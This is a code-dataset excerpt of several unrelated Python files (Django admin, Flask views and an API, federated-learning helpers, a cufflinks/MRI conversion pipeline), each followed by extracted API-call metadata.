{}), "('.')\n", (1172, 1177), False, 'from discord.ext import commands\n'), ((1201, 1243), 'discord.Game', 'discord.Game', ([], {'name': '"""Tax Evasion Simulator"""'}), "(name='Tax Evasion Simulator')\n", (1213, 1243), False, 'import discord\n'), ((1311, 1350), 'discord.AllowedMentions', 'discord.AllowedMentions', ([], {'everyone': '(False)'}), '(everyone=False)\n', (1334, 1350), False, 'import discord\n'), ((1565, 1583), 'os.scandir', 'os.scandir', (['"""cogs"""'], {}), "('cogs')\n", (1575, 1583), False, 'import os\n'), ((2519, 2538), 'contextlib.suppress', 'suppress', (['Exception'], {}), '(Exception)\n', (2527, 2538), False, 'from contextlib import suppress\n'), ((2641, 2660), 'contextlib.suppress', 'suppress', (['Exception'], {}), '(Exception)\n', (2649, 2660), False, 'from contextlib import suppress\n'), ((3004, 3034), 
'aiohttp.ClientTimeout', 'aiohttp.ClientTimeout', ([], {'total': '(6)'}), '(total=6)\n', (3025, 3034), False, 'import aiohttp\n')] |
from django.contrib import admin
from django.contrib.contenttypes.admin import GenericTabularInline
from .models import (Response, Survey, Question,
Answer, Report, Attachment, MapNode)
from import_export.admin import ImportExportActionModelAdmin
class QuestionInline(admin.TabularInline):
    """Tabular inline for a survey's questions, ordered by ``order``."""
    model = Question
    ordering = ("order",)
    extra = 1
class AttachmentInline(GenericTabularInline):
    """Generic inline for attachments, linked via content_type/object_id."""
    model = Attachment
    extra = 1
    ct_fk_field = 'object_id'
    ct_field = 'content_type'
@admin.register(Survey)
class SurveyAdmin(ImportExportActionModelAdmin):
    """Survey admin with import/export and inline question editing."""
    list_display = ("name",)
    inlines = [QuestionInline]
class AnswerBaseInline(admin.StackedInline):
    """Stacked inline showing each answer of a response; the question is
    read-only and no blank answer forms are added."""
    fields = ("question", "body")
    readonly_fields = ("question",)
    extra = 0
    model = Answer
@admin.register(Response)
class ResponseAdmin(ImportExportActionModelAdmin):
    """Response admin: read-only metadata, inline answers/attachments,
    filterable and drillable by survey, date, and user."""
    list_display = ("id", "survey", "created", "user")
    list_filter = ("survey", "created", "user")
    date_hierarchy = "created"
    inlines = [AttachmentInline, AnswerBaseInline]
    readonly_fields = ("survey", "created", "updated", "user")
@admin.register(Report)
class ReportAdmin(ImportExportActionModelAdmin):
    """Report admin with a two-pane picker for the checklists m2m."""
    list_display = ("name", "date_from", "date_to")
    filter_horizontal = ("checklists",)
@admin.register(Attachment)
class AttachmentAdmin(admin.ModelAdmin):
    """Attachment admin listing name, description, timestamp and file."""
    list_display = ("name", 'description', 'timestamp', 'file')
@admin.register(MapNode)
class MapNodeAdmin(admin.ModelAdmin):
    """Default admin for map nodes (no customisation)."""
    pass
@admin.register(Question)
class QuestionAdmin(admin.ModelAdmin):
    """Question admin, filterable by the survey each question belongs to."""
    list_filter = ("survey",)
| [
"django.contrib.admin.register"
] | [((523, 545), 'django.contrib.admin.register', 'admin.register', (['Survey'], {}), '(Survey)\n', (537, 545), False, 'from django.contrib import admin\n'), ((808, 832), 'django.contrib.admin.register', 'admin.register', (['Response'], {}), '(Response)\n', (822, 832), False, 'from django.contrib import admin\n'), ((1135, 1157), 'django.contrib.admin.register', 'admin.register', (['Report'], {}), '(Report)\n', (1149, 1157), False, 'from django.contrib import admin\n'), ((1302, 1328), 'django.contrib.admin.register', 'admin.register', (['Attachment'], {}), '(Attachment)\n', (1316, 1328), False, 'from django.contrib import admin\n'), ((1437, 1460), 'django.contrib.admin.register', 'admin.register', (['MapNode'], {}), '(MapNode)\n', (1451, 1460), False, 'from django.contrib import admin\n'), ((1511, 1535), 'django.contrib.admin.register', 'admin.register', (['Question'], {}), '(Question)\n', (1525, 1535), False, 'from django.contrib import admin\n')] |
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 6 10:59:16 2019
@author: WEIKANG
"""
import numpy as np
import copy
# import torch
import random
# from Calculate import get_1_norm#, get_2_norm, inner_product, avg_grads
def noise_add(noise_scale, w):
    """Return a copy of ``w`` with zero-mean Gaussian noise added.

    Args:
        noise_scale: standard deviation of the Gaussian noise.
        w: either a single array-like exposing a ``size()`` method, or a
           list of state dicts (parameter name -> tensor) as produced by
           local clients; each tensor must expose ``size()``.

    Returns:
        A deep copy of ``w`` with noise of scale ``noise_scale`` added
        to every parameter; the input is left untouched.
    """
    w_noise = copy.deepcopy(w)
    if isinstance(w[0], np.ndarray):
        noise = np.random.normal(0, noise_scale, w.size())
        w_noise = w_noise + noise
    else:
        # List of per-client state dicts: perturb every parameter tensor.
        for k in range(len(w)):
            for i in w[k]:
                noise = np.random.normal(0, noise_scale, w[k][i].size())
                w_noise[k][i] = w_noise[k][i] + noise
    return w_noise
def users_sampling(args, w, chosenUsers):
    """Select the local weights of the chosen users.

    When only a subset of users is sampled
    (``args.num_chosenUsers < args.num_users``) the chosen users'
    weights are returned in the given order (by reference); otherwise a
    deep copy of all local weights is returned.
    """
    if args.num_chosenUsers >= args.num_users:
        return copy.deepcopy(w)
    return [w[user] for user in chosenUsers]
'''def clipping(args, w):
if get_1_norm(w) > args.clipthr:
w_local = copy.deepcopy(w)
for i in w.keys():
w_local[i]=copy.deepcopy(w[i]*args.clipthr/get_1_norm(w))
else:
w_local = copy.deepcopy(w)
return w_local'''
| [
"copy.deepcopy"
] | [((269, 285), 'copy.deepcopy', 'copy.deepcopy', (['w'], {}), '(w)\n', (282, 285), False, 'import copy\n'), ((1063, 1079), 'copy.deepcopy', 'copy.deepcopy', (['w'], {}), '(w)\n', (1076, 1079), False, 'import copy\n')] |
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @author: Drizzle_Zhang
# @file: cufflinks.py
# @time: 2018/10/24 20:14
from time import time
from argparse import ArgumentParser
import os
import subprocess
def cufflinks(bam_path, cufflinks_out, process=3, thread=10):
    """Run cufflinks on every SRR sample directory found under ``bam_path``.

    Samples are processed in batches of ``process`` concurrent cufflinks
    jobs, each using ``thread`` threads; per-sample output goes to
    ``cufflinks_out/<sample>``.

    :param bam_path: directory of per-sample tophat output folders (each
        named ``SRR...`` and holding ``accepted_hits.bam``)
    :param cufflinks_out: directory for the per-sample cufflinks output
    :param process: number of samples processed concurrently
    :param thread: number of threads per cufflinks job
    """
    # read samples from results of tophat
    samples = os.listdir(bam_path)
    list_srr = []
    for sample in samples:
        if sample[:3] == 'SRR' and os.path.isdir(os.path.join(bam_path, sample)):
            list_srr.append(sample)
    # run cufflinks in batches of `process` concurrent jobs
    subprocesses = []
    for i in range(len(list_srr)):
        if i % process == 0:
            for sub in subprocesses:
                sub.wait()
            subprocesses = []
        subprocesses.append(subprocess.Popen("cufflinks -p " + str(thread) +
                            " -o " + os.path.join(cufflinks_out, list_srr[i]) + ' '
                            + os.path.join(os.path.join(bam_path, list_srr[i]), 'accepted_hits.bam'),
                            shell=True))
    # Bug fix: also wait for the final (possibly partial) batch, so the
    # function does not return while cufflinks jobs are still running
    # (downstream cuffmerge would otherwise read incomplete output).
    for sub in subprocesses:
        sub.wait()
    return
def cuffmerge(cufflinks_path, cuffmerge_path, gtf_file, fasta_file, thread=20):
    """Merge per-sample cufflinks assemblies into one transcriptome.

    Writes an ``assemblies.txt`` manifest listing every SRR sample's
    ``transcripts.gtf`` under ``cufflinks_path``, then runs cuffmerge
    against the reference annotation (``gtf_file``) and genome
    (``fasta_file``), writing its output to ``cuffmerge_path``.
    """
    # build assemblies.txt (manifest of all transcripts.gtf files)
    samples = os.listdir(cufflinks_path)
    with open(os.path.join(cufflinks_path, 'assemblies.txt'), 'w') as w_asm:
        for sample in samples:
            if sample[:3] == 'SRR' and os.path.isdir(os.path.join(cufflinks_path, sample)):
                w_asm.write(os.path.join(os.path.join(cufflinks_path, sample)) + '/transcripts.gtf' + '\n')
    # run cuffmerge
    os.system("cuffmerge -g " + gtf_file + " -s " + fasta_file + " -o " + cuffmerge_path + " -p " + str(thread) + " " +
              os.path.join(cufflinks_path, 'assemblies.txt'))
    return
def cuffdiff(bam_path, cuffmerge_path, cuffdiff_path, fasta_file, group_name, num_group1, thread=20):
    """Run cuffdiff between two sample groups.

    All ``SRR*`` samples under ``bam_path`` are sorted by name; the
    first ``num_group1`` form group 1 and the rest form group 2.
    Cuffdiff runs against the merged transcriptome in ``cuffmerge_path``.

    NOTE(review): ``fasta_file`` is accepted but never passed to the
    cuffdiff command (no ``-b`` option) — confirm whether bias
    correction was intended.
    """
    # divide into groups
    samples = os.listdir(bam_path)
    all_sample = []
    for sample in samples:
        if sample[:3] == 'SRR' and os.path.isdir(os.path.join(bam_path, sample)):
            all_sample.append(os.path.join(os.path.join(bam_path, sample), 'accepted_hits.bam'))
    all_sample.sort()
    group1 = all_sample[:num_group1]
    group2 = all_sample[num_group1:]
    # run cuffdiff
    os.system("cuffdiff -o " + cuffdiff_path + " -p " + str(thread) +
              " -L " + group_name + " -u " + os.path.join(cuffmerge_path, 'merged.gtf') + ' ' +
              ','.join(group1) + ' ' + ','.join(group2))
    return
def main_func():
    """Parse command-line options and run the requested pipeline steps.

    ``--procedure`` selects any subset of cufflinks/cuffmerge/cuffdiff;
    each step only runs when all of its required arguments are present.
    When ``--process`` is omitted, the callees' own defaults are used.
    """
    # take arguments from the commandline
    parser = ArgumentParser(description='An aggregated python script of differential expression analysis '
                                       'using cufflinks')
    parser.add_argument('--bam_path',
                        help='path of bam-files from trimgalore, each sample has a single folder in the path '
                             '(cufflink, cuffdiff)')
    parser.add_argument('--cufflinks_path',
                        help='the path saving the output of cufflinks function, and needs to be made in advance '
                             '(cufflink, cuffmerge)')
    parser.add_argument('--process', nargs=4, type=int,
                        help='management of multiple process and thread, ther are four parameters and they indicate '
                             'the number of sample processed by cufflinks simultaneously, number of threads of '
                             'cufflinks, number of threads of cuffmerge and number of threads of cuffdiff ')
    parser.add_argument('--cuffmerge_path',
                        help='the path saving the output of cuffmerge function, and needs to be made in advance '
                             '(cuffmerge, cuffdiff)')
    parser.add_argument('--cuffdiff_path',
                        help='the path saving the output of cuffdiff function, and needs to be made in advance '
                             '(cuffdiff)')
    parser.add_argument('--gtf_file', help='path of gtf-file involving genome annotation information (cuffmerge)')
    parser.add_argument('--fasta_file', help='path of fasta-file of reference genome (cuffmerge, cuffdiff)')
    parser.add_argument('--group_name', help='groups in the process of differential expression analysis '
                                             '(cuffdiff)')
    parser.add_argument('--num_group1', type=int, help='number of samples in group1 (cuffdiff)')
    parser.add_argument('--procedure', help="procedures which need to run, input a comma-delimited list, for example, "
                                            "'cufflinks,cuffmerge'", required=True)
    args = parser.parse_args()
    procedures = set(args.procedure.strip().split(','))
    # Deduplicated from the original two near-identical branches: when
    # --process is absent, fall back to the callees' default parallelism
    # (cufflinks samples, cufflinks threads, cuffmerge threads, cuffdiff
    # threads) so behavior is unchanged.
    list_process = args.process if args.process else [3, 10, 20, 20]
    # cufflinks
    if args.bam_path and args.cufflinks_path and 'cufflinks' in procedures:
        cufflinks(args.bam_path, args.cufflinks_path, list_process[0], list_process[1])
    # cuffmerge
    if args.cufflinks_path and args.cuffmerge_path and args.gtf_file and args.fasta_file \
            and 'cuffmerge' in procedures:
        cuffmerge(args.cufflinks_path, args.cuffmerge_path, args.gtf_file, args.fasta_file, list_process[2])
    # cuffdiff
    if args.bam_path and args.cuffmerge_path and args.cuffdiff_path and args.fasta_file and args.group_name \
            and args.num_group1 and 'cuffdiff' in procedures:
        cuffdiff(args.bam_path, args.cuffmerge_path, args.cuffdiff_path, args.fasta_file, args.group_name,
                 args.num_group1, list_process[3])
    return
if __name__ == '__main__':
    # Time the whole run and report elapsed seconds.
    start = time()
    main_func()
    end = time()
    print(end - start)
| [
"os.path.join",
"os.listdir",
"time.time",
"argparse.ArgumentParser"
] | [((342, 362), 'os.listdir', 'os.listdir', (['bam_path'], {}), '(bam_path)\n', (352, 362), False, 'import os\n'), ((1242, 1268), 'os.listdir', 'os.listdir', (['cufflinks_path'], {}), '(cufflinks_path)\n', (1252, 1268), False, 'import os\n'), ((1950, 1970), 'os.listdir', 'os.listdir', (['bam_path'], {}), '(bam_path)\n', (1960, 1970), False, 'import os\n'), ((2643, 2762), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""An aggregated python script of differential expression analysis using cufflinks"""'}), "(description=\n 'An aggregated python script of differential expression analysis using cufflinks'\n )\n", (2657, 2762), False, 'from argparse import ArgumentParser\n'), ((6643, 6649), 'time.time', 'time', ([], {}), '()\n', (6647, 6649), False, 'from time import time\n'), ((6678, 6684), 'time.time', 'time', ([], {}), '()\n', (6682, 6684), False, 'from time import time\n'), ((1284, 1330), 'os.path.join', 'os.path.join', (['cufflinks_path', '"""assemblies.txt"""'], {}), "(cufflinks_path, 'assemblies.txt')\n", (1296, 1330), False, 'import os\n'), ((1740, 1786), 'os.path.join', 'os.path.join', (['cufflinks_path', '"""assemblies.txt"""'], {}), "(cufflinks_path, 'assemblies.txt')\n", (1752, 1786), False, 'import os\n'), ((460, 490), 'os.path.join', 'os.path.join', (['bam_path', 'sample'], {}), '(bam_path, sample)\n', (472, 490), False, 'import os\n'), ((2070, 2100), 'os.path.join', 'os.path.join', (['bam_path', 'sample'], {}), '(bam_path, sample)\n', (2082, 2100), False, 'import os\n'), ((1433, 1469), 'os.path.join', 'os.path.join', (['cufflinks_path', 'sample'], {}), '(cufflinks_path, sample)\n', (1445, 1469), False, 'import os\n'), ((2147, 2177), 'os.path.join', 'os.path.join', (['bam_path', 'sample'], {}), '(bam_path, sample)\n', (2159, 2177), False, 'import os\n'), ((982, 1017), 'os.path.join', 'os.path.join', (['bam_path', 'list_srr[i]'], {}), '(bam_path, list_srr[i])\n', (994, 1017), False, 'import os\n'), ((874, 914), 'os.path.join', 
'os.path.join', (['cufflinks_out', 'list_srr[i]'], {}), '(cufflinks_out, list_srr[i])\n', (886, 914), False, 'import os\n'), ((2441, 2483), 'os.path.join', 'os.path.join', (['cuffmerge_path', '"""merged.gtf"""'], {}), "(cuffmerge_path, 'merged.gtf')\n", (2453, 2483), False, 'import os\n'), ((1514, 1550), 'os.path.join', 'os.path.join', (['cufflinks_path', 'sample'], {}), '(cufflinks_path, sample)\n', (1526, 1550), False, 'import os\n')] |
from flask import make_response, request, render_template, redirect
from flask.helpers import url_for
from models.session import Session
from models.user import User
from werkzeug.security import generate_password_hash
class RegisterView:
    """Handles GET and POST for the user-registration page."""

    RESULT_SUCCESS = "success"
    RESULT_USEREXISTS = "userexists"
    RESULT_CREATEFAILED = "createfailed"

    def __init__(self):
        # Resume (or create) the session identified by the cookie.
        self.session = Session(request.cookies.get("session_id"))
        self.view_model = {
            "logged_in": self.session.logged_in,
            "username": self.session.username,
            "result": self.result_string(),
        }

    def render(self):
        """Dispatch on the HTTP method of the current request."""
        if request.method == "GET":
            return self.get()
        if request.method == "POST":
            return self.post()

    def get(self):
        """Render the registration form and refresh the session cookie."""
        body = render_template("register.html", vm=self.view_model)
        response = make_response(body)
        response.set_cookie("session_id", self.session.session_id, httponly=True, secure=True)
        return response

    def post(self):
        """Attempt to register the posted credentials, then redirect."""
        response_url = url_for(".register") + "?result={result}"
        # TODO: Validate username requirements
        user = User(request.form["username"])
        if user.user_exists():
            return redirect(response_url.format(result=self.RESULT_USEREXISTS))
        # TODO: Validate password requirements
        user.password = generate_password_hash(request.form["password"], salt_length=16)
        outcome = self.RESULT_SUCCESS if user.create_new_user() else self.RESULT_CREATEFAILED
        return redirect(response_url.format(result=outcome))

    def result_string(self):
        """Translate the ``result`` query parameter into a user message."""
        messages = {
            self.RESULT_SUCCESS: "registration_successful",
            self.RESULT_USEREXISTS: "Username already exists.",
            self.RESULT_CREATEFAILED: "Failed to create user.",
        }
        result = request.args.get("result")
        if result is None:
            return None
        return messages.get(result, "Unknown error.")
| [
"flask.render_template",
"flask.request.args.get",
"models.user.User",
"flask.request.cookies.get",
"werkzeug.security.generate_password_hash",
"flask.helpers.url_for"
] | [((1189, 1219), 'models.user.User', 'User', (["request.form['username']"], {}), "(request.form['username'])\n", (1193, 1219), False, 'from models.user import User\n'), ((1431, 1495), 'werkzeug.security.generate_password_hash', 'generate_password_hash', (["request.form['password']"], {'salt_length': '(16)'}), "(request.form['password'], salt_length=16)\n", (1453, 1495), False, 'from werkzeug.security import generate_password_hash\n'), ((1690, 1716), 'flask.request.args.get', 'request.args.get', (['"""result"""'], {}), "('result')\n", (1706, 1716), False, 'from flask import make_response, request, render_template, redirect\n'), ((406, 439), 'flask.request.cookies.get', 'request.cookies.get', (['"""session_id"""'], {}), "('session_id')\n", (425, 439), False, 'from flask import make_response, request, render_template, redirect\n'), ((830, 882), 'flask.render_template', 'render_template', (['"""register.html"""'], {'vm': 'self.view_model'}), "('register.html', vm=self.view_model)\n", (845, 882), False, 'from flask import make_response, request, render_template, redirect\n'), ((1047, 1067), 'flask.helpers.url_for', 'url_for', (['""".register"""'], {}), "('.register')\n", (1054, 1067), False, 'from flask.helpers import url_for\n')] |
#! /bin/bash.env python
# *-* coding:utf-8 *-*
import os
import sys
os.system("touch a.sh && chmod +x a.sh")
os.system("mkdir output")
print("文件会被转换在output文件夹中")
x=int(input("输入数量:"))
fo = open("a.sh","r+")
for a in range(1,1+x) :
com="mri_convert -i "+"IM"+str(a)+" -o "+"./output/IM"+str(a)+".mgz"
fo.write(str(com))
fo.write("\n")
print("str(b) has been converted \n")
fo.close()
os.system("./a.sh")
os.system("rm a.sh")
| [
"os.system"
] | [((70, 110), 'os.system', 'os.system', (['"""touch a.sh && chmod +x a.sh"""'], {}), "('touch a.sh && chmod +x a.sh')\n", (79, 110), False, 'import os\n'), ((111, 136), 'os.system', 'os.system', (['"""mkdir output"""'], {}), "('mkdir output')\n", (120, 136), False, 'import os\n'), ((393, 412), 'os.system', 'os.system', (['"""./a.sh"""'], {}), "('./a.sh')\n", (402, 412), False, 'import os\n'), ((413, 433), 'os.system', 'os.system', (['"""rm a.sh"""'], {}), "('rm a.sh')\n", (422, 433), False, 'import os\n')] |
"""Overview page of contributions.
* Country selection
* Grouping by categories
* Statistics
"""
from flask import make_response
from config import Names as N
from control.utils import mjson, mktsv, pick as G, serverprint
from control.table import Table, SENSITIVE_TABLES, SENSITIVE_FIELDS
from control.typ.related import castObjectId
REVIEWED1 = "reviewed1"
REVIEWED2 = "reviewed2"
R1RANK = "r1Rank"
R2RANK = "r2Rank"
ASSESSED_STATUS = {
None: ("no assessment", "a-none"),
N.incomplete: ("started", "a-started"),
N.incompleteRevised: ("revision", "a-started"),
N.incompleteWithdrawn: ("withdrawn", "a-none"),
N.complete: ("filled-in", "a-self"),
N.completeRevised: ("revised", "a-self"),
N.completeWithdrawn: ("withdrawn", "a-none"),
N.submitted: ("in review", "a-inreview"),
N.submittedRevised: ("in review", "a-inreview"),
N.reviewReject: ("rejected", "a-rejected"),
N.reviewAccept: ("accepted", "a-accepted"),
}
ASSESSED_LABELS = {stage: info[0] for (stage, info) in ASSESSED_STATUS.items()}
ASSESSED_CLASS = {stage: info[1] for (stage, info) in ASSESSED_STATUS.items()}
ASSESSED_CLASS1 = {info[0]: info[1] for info in ASSESSED_STATUS.values()}
ASSESSED_DEFAULT_CLASS = ASSESSED_STATUS[None][1]
ASSESSED_RANK = {stage: i for (i, stage) in enumerate(ASSESSED_STATUS)}
NO_REVIEW = {
N.incomplete,
N.incompleteRevised,
N.incompleteWithdrawn,
N.complete,
N.completeRevised,
N.completeWithdrawn,
}
IN_REVIEW = {
N.submitted,
N.submittedRevised,
}
ADVISORY_REVIEW = {
N.reviewAdviseAccept,
N.reviewAdviseReject,
N.reviewAdviseRevise,
}
FINAL_REVIEW = {
N.reviewAccept,
N.reviewReject,
N.reviewRevise,
}
REVIEWED_STATUS = {
None: ("", "r-none"),
"noReview": ("not reviewable", "r-noreview"),
"inReview": ("in review", "r-inreview"),
"skipReview": ("review skipped", "r-skipreview"),
N.reviewAdviseReject: ("rejected", "r-rejected"),
N.reviewAdviseAccept: ("accepted", "r-accepted"),
N.reviewAdviseRevise: ("revise", "r-revised"),
N.reviewReject: ("rejected", "r-rejected"),
N.reviewAccept: ("accepted", "r-accepted"),
N.reviewRevise: ("revise", "r-revised"),
}
REVIEW_LABELS = {stage: info[0] for (stage, info) in REVIEWED_STATUS.items()}
REVIEW_CLASS = {stage: info[1] for (stage, info) in REVIEWED_STATUS.items()}
REVIEW_CLASS1 = {info[0]: info[1] for info in REVIEWED_STATUS.values()}
REVIEW_DEFAULT_CLASS = REVIEWED_STATUS[None][1]
REVIEW_RANK = {stage: i for (i, stage) in enumerate(REVIEWED_STATUS)}
class Api:
    def __init__(self, context):
        """Store the app context and prepare per-format response headers.

        :param context: application context giving access to the type
            converters (country, year, contribution type).
        """
        self.context = context
        types = context.types
        self.countryType = types.country
        self.yearType = types.year
        self.typeType = types.typeContribution
        # Per-format response headers; caching is disabled because the
        # API serves live workflow data.
        self.headers = dict(
            json={
                "Expires": "0",
                "Cache-Control": "no-cache, no-store, must-revalidate",
                "Content-Type": "application/json",
                "Content-Encoding": "utf-8",
            },
            tsv={
                "Expires": "0",
                "Cache-Control": "no-cache, no-store, must-revalidate",
                "Content-Type": "text/tab-separated-values",
                "Content-Encoding": "utf-8",
            },
        )
    def notimplemented(self, verb):
        """Fallback for unknown API verbs: log and return a JSON null."""
        serverprint(f"Invalid api call requested: {verb}")
        return make_response(mjson(None), self.headers["json"])
    def list(self, givenTable):
        """Serve a whole table as JSON or TSV.

        ``givenTable`` may carry an extension (e.g. ``contrib.tsv``);
        without one, JSON is assumed.  Sensitive tables are refused:
        ``data`` stays None, which serializes to null.
        """
        parts = givenTable.rsplit(".", 1)
        if len(parts) == 1:
            table = givenTable
            ext = "json"
        else:
            (table, ext) = parts
            if ext not in {"json", "tsv"}:
                serverprint(f"Invalid extension: {ext} in {givenTable}")
                return make_response(mjson(None), self.headers["json"])
        data = None
        if table is not None and table not in SENSITIVE_TABLES:
            if table == "contrib":
                # contributions get extra workflow-derived columns
                data = self.getContribs(ext)
            else:
                context = self.context
                tableObj = Table(context, table)
                data = tableObj.wrap(None, logical=True)
        if data is None:
            serverprint(f"Non existing table requested: {table}")
        return make_response(
            mjson(data) if ext == "json" else mktsv(data), self.headers[ext]
        )
def view(self, table, givenEid):
record = None
eid = castObjectId(givenEid)
if table is not None and eid is not None and table not in SENSITIVE_TABLES:
context = self.context
tableObj = Table(context, table)
recordObj = tableObj.record(eid=eid)
record = recordObj.wrapLogical()
if table == "contrib":
extra = self.getExtra(record)
for (k, v) in extra.items():
record[k] = v
for k in SENSITIVE_FIELDS:
if k in record:
del record[k]
k = "typeContribution"
if k in record:
record["type"] = record[k]
del record[k]
if record is None:
serverprint(f"Non existing record requested: {table}/{givenEid}")
return make_response(mjson(record), self.headers["json"])
def getExtra(self, record):
context = self.context
wf = context.wf
workflow = wf.computeWorkflow(record)
selected = G(workflow, N.selected)
aStage = G(workflow, N.aStage)
r2Stage = G(workflow, N.r2Stage)
if r2Stage in {N.reviewAccept, N.reviewReject}:
aStage = r2Stage
score = G(workflow, N.score)
assessed = ASSESSED_STATUS[aStage][0]
aRank = (G(ASSESSED_RANK, aStage, default=0), score or 0)
if aStage != N.reviewAccept:
score = None
extra = {
N.assessed: assessed,
N.arank: aRank,
N.astage: aStage,
N.score: score,
N.selected: selected,
}
preR1Stage = G(workflow, N.r1Stage)
noReview = aStage is None or aStage in NO_REVIEW
inReview = aStage in IN_REVIEW
advReview = preR1Stage in ADVISORY_REVIEW
r1Stage = (
"noReview"
if noReview
else preR1Stage
if advReview
else "inReview"
if inReview
else "skipReview"
)
r2Stage = (
"noReview"
if noReview
else "inReview"
if inReview
else G(workflow, N.r2Stage)
)
reviewed1 = REVIEWED_STATUS[r1Stage][0]
reviewed2 = REVIEWED_STATUS[r2Stage][0]
r1Rank = G(REVIEW_RANK, r1Stage, default=0)
r2Rank = G(REVIEW_RANK, r2Stage, default=0)
extra.update(
{
REVIEWED1: reviewed1,
REVIEWED2: reviewed2,
R1RANK: r1Rank,
R2RANK: r2Rank,
N.r1Stage: r1Stage,
N.r2Stage: r2Stage,
}
)
return extra
def getContribs(self, ext):
context = self.context
db = context.db
countryType = self.countryType
yearType = self.yearType
typeType = self.typeType
asTsv = ext == "tsv"
contribs = []
if asTsv:
contribsFull = {G(r, N._id): r for r in db.getList(N.contrib)}
context = self.context
tableObj = Table(context, N.contrib)
for record in db.bulkContribWorkflow(None, False):
title = G(record, N.title)
contribId = G(record, N._id)
selected = G(record, N.selected)
aStage = G(record, N.aStage)
r2Stage = G(record, N.r2Stage)
if r2Stage in {N.reviewAccept, N.reviewReject}:
aStage = r2Stage
score = G(record, N.score)
assessed = ASSESSED_STATUS[aStage][0]
aRank = (G(ASSESSED_RANK, aStage, default=0), score or 0)
if aStage != N.reviewAccept:
score = None
countryRep = countryType.titleStr(
G(db.country, G(record, N.country)), markup=None
)
yearRep = yearType.titleStr(G(db.year, G(record, N.year)), markup=None)
typeRep = typeType.titleStr(
G(db.typeContribution, G(record, N.type)), markup=None
)
contribRecord = {
N._id: contribId,
N.country: countryRep,
N.year: yearRep,
N.type: typeRep,
N.title: title,
N.assessed: assessed,
N.arank: aRank,
N.astage: aStage,
N.score: score,
N.selected: selected,
}
preR1Stage = G(record, N.r1Stage)
noReview = aStage is None or aStage in NO_REVIEW
inReview = aStage in IN_REVIEW
advReview = preR1Stage in ADVISORY_REVIEW
r1Stage = (
"noReview"
if noReview
else preR1Stage
if advReview
else "inReview"
if inReview
else "skipReview"
)
r2Stage = (
"noReview"
if noReview
else "inReview"
if inReview
else G(record, N.r2Stage)
)
reviewed1 = REVIEWED_STATUS[r1Stage][0]
reviewed2 = REVIEWED_STATUS[r2Stage][0]
r1Rank = G(REVIEW_RANK, r1Stage, default=0)
r2Rank = G(REVIEW_RANK, r2Stage, default=0)
contribRecord.update(
{
REVIEWED1: reviewed1,
REVIEWED2: reviewed2,
R1RANK: r1Rank,
R2RANK: r2Rank,
N.r1Stage: r1Stage,
N.r2Stage: r2Stage,
}
)
if asTsv:
fullObj = tableObj.record(record=G(contribsFull, contribId, {}))
full = fullObj.wrapLogical()
contribRecord.update({
N.dateDecided: G(full, N.dateDecided),
N.vcc: G(full, N.vcc),
N.description: G(full, N.description),
N.contactPersonName: G(full, N.contactPersonName),
N.contactPersonEmail: G(full, N.contactPersonEmail),
N.urlContribution: G(full, N.urlContribution),
N.urlAcademic: G(full, N.urlAcademic),
N.tadirahObject: G(full, N.tadirahObject),
N.tadirahActivity: G(full, N.tadirahActivity),
N.tadirahTechnique: G(full, N.tadirahTechnique),
N.keyword: G(full, N.keyword),
N.discipline: G(full, N.discipline),
})
contribs.append(contribRecord)
return contribs
| [
"control.table.Table",
"control.typ.related.castObjectId",
"control.utils.pick",
"control.utils.serverprint",
"control.utils.mjson",
"control.utils.mktsv"
] | [((3351, 3401), 'control.utils.serverprint', 'serverprint', (['f"""Invalid api call requested: {verb}"""'], {}), "(f'Invalid api call requested: {verb}')\n", (3362, 3401), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4458, 4480), 'control.typ.related.castObjectId', 'castObjectId', (['givenEid'], {}), '(givenEid)\n', (4470, 4480), False, 'from control.typ.related import castObjectId\n'), ((5493, 5516), 'control.utils.pick', 'G', (['workflow', 'N.selected'], {}), '(workflow, N.selected)\n', (5494, 5516), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5534, 5555), 'control.utils.pick', 'G', (['workflow', 'N.aStage'], {}), '(workflow, N.aStage)\n', (5535, 5555), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5574, 5596), 'control.utils.pick', 'G', (['workflow', 'N.r2Stage'], {}), '(workflow, N.r2Stage)\n', (5575, 5596), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5698, 5718), 'control.utils.pick', 'G', (['workflow', 'N.score'], {}), '(workflow, N.score)\n', (5699, 5718), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((6097, 6119), 'control.utils.pick', 'G', (['workflow', 'N.r1Stage'], {}), '(workflow, N.r1Stage)\n', (6098, 6119), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((6760, 6794), 'control.utils.pick', 'G', (['REVIEW_RANK', 'r1Stage'], {'default': '(0)'}), '(REVIEW_RANK, r1Stage, default=0)\n', (6761, 6794), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((6812, 6846), 'control.utils.pick', 'G', (['REVIEW_RANK', 'r2Stage'], {'default': '(0)'}), '(REVIEW_RANK, r2Stage, default=0)\n', (6813, 6846), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((3431, 3442), 'control.utils.mjson', 'mjson', (['None'], {}), '(None)\n', (3436, 3442), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((3723, 3779), 
'control.utils.serverprint', 'serverprint', (['f"""Invalid extension: {ext} in {givenTable}"""'], {}), "(f'Invalid extension: {ext} in {givenTable}')\n", (3734, 3779), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4213, 4266), 'control.utils.serverprint', 'serverprint', (['f"""Non existing table requested: {table}"""'], {}), "(f'Non existing table requested: {table}')\n", (4224, 4266), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4623, 4644), 'control.table.Table', 'Table', (['context', 'table'], {}), '(context, table)\n', (4628, 4644), False, 'from control.table import Table, SENSITIVE_TABLES, SENSITIVE_FIELDS\n'), ((5207, 5272), 'control.utils.serverprint', 'serverprint', (['f"""Non existing record requested: {table}/{givenEid}"""'], {}), "(f'Non existing record requested: {table}/{givenEid}')\n", (5218, 5272), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5302, 5315), 'control.utils.mjson', 'mjson', (['record'], {}), '(record)\n', (5307, 5315), False, 'from control.utils import mjson, mktsv, pick as G, 